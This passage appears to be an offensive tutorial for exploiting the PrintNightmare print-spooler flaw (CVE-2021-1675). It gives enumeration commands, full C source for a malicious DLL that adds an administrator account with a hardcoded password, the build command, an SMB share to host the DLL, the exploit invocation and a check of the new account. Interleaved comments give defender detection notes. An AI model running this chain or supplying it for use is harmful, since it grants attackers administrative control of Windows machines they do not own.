# with cme
nxc smb $target_ip -M spooler
# with impacket
rpcdump.py @$target_ip | egrep 'MS-RPRN|MS-PAR'
Here is the DLL we will use; it creates a user and adds it to the local Administrators group.
#include <windows.h>
/* Payload body: creates a local account and adds it to the local
 * Administrators group by shelling out to net.exe via system().
 *
 * Defender notes:
 *  - The account name and password are compiled into the DLL as plain
 *    string literals, so they are trivially recoverable from the binary
 *    on disk (strings/hex dump) and make a good detection/hunting artifact.
 *  - When this DLL is loaded into the print spooler as the page intends,
 *    the observable behaviour is the spooler service process spawning a
 *    command interpreter and net.exe, followed by a local account creation
 *    and a local group membership change.
 *  - NOTE(review): both system() return values are ignored, so the function
 *    always returns 0 regardless of whether either command succeeded.
 */
int RunCMD()
{
system("net users pnightmare Passw0rd123. /add");
system("net localgroup administrators pnightmare /add");
return 0;
}
/* DLL entry point. The only work happens on DLL_PROCESS_ATTACH, i.e. the
 * moment the DLL is mapped into a process: RunCMD() is invoked and the
 * payload runs with the privileges of whatever process loaded the DLL.
 * Thread attach/detach and process detach are no-ops.
 *
 * Defender notes:
 *  - Because the effect is triggered purely by loading, any mechanism that
 *    coerces a privileged process into loading an attacker-supplied DLL is
 *    sufficient to execute it; there is no exported function to call.
 *  - NOTE(review): Microsoft guidance discourages spawning processes from
 *    DllMain (loader lock is held); the code does it anyway, which is one
 *    reason such payloads can hang or crash the host process.
 *  - The switch has no default branch; unknown reason codes fall out and
 *    the function still returns TRUE, so the load never fails.
 */
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
/* Runs once, at load time, in the loading process's context. */
RunCMD();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
/* Always reports success to the loader. */
return TRUE;
}
x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c
# clone the repo
git clone https://github.com/cube0x0/CVE-2021-1675 printnightmare
# prepare smb share with the nightmare.dll inside
smbserver.py -smb2support share .
# exploit
python3 CVE-2021-1675.py $domain/$user:$password@$hostnameanddomainname '\\192.168.56.1\share\nightmare.dll'
# verify
cme smb $target_ip -u pnightmare -p 'Passw0rd123.'